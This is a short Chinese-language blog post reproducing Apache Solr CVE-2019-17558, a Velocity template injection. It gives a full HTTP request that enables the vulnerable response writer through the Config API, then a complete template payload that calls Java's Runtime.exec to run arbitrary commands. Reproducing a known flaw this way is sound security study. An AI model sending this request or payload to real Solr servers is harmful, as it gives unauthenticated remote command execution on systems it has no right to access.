Apache Solr CVE-2019-17558漏洞复现

2022-09-26 19:22:45 浏览数 (3)

Apache Solr CVE-2019-17558漏洞复现

Apache Solr简介

Apache Solr是一个企业级搜索平台,用Java编写且开源,基于Apache Lucene项目。

复现部分一共分为两步

条件:

  1. Solr控制台未设置鉴权(默认),或登录凭证被猜出,这样就能访问到Config API。
  2. 一个core(索引库)对应一个solrconfig.xml。当某个core(索引库)的solrconfig.xml使用了以下配置,才会受该漏洞影响。
  3. 版本:5.0.0 到 8.3.1 版本

第一步:设置VelocityResponseWriter插件的params.resource.loader.enabled选项设置为true

params.resource.loader.enabled是用来控制是否允许用户在http请求中使用指定模板,但是这个选项默认是false,所以我们需要将他设置为true。

可以看到在未设置前,params.resource.loader.enabled是false。

接下来就是将params.resource.loader.enabled选项设置为true

代码语言:javascript复制
POST /solr/demo/config HTTP/1.1
Host: IP:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

设置后我看再访问IP:8983/solr/demo/config可以看到选项变为true。

这一步后可以看到在/var/solr/data/demo/conf多出了一个configoverlay.json文件

第二步直接REC

注入 Velocity 模板即可执行任意命令

Payload

代码语言:javascript复制
http://ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('ls')) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

命令就在exec('ls')

Q.E.D.

0 人点赞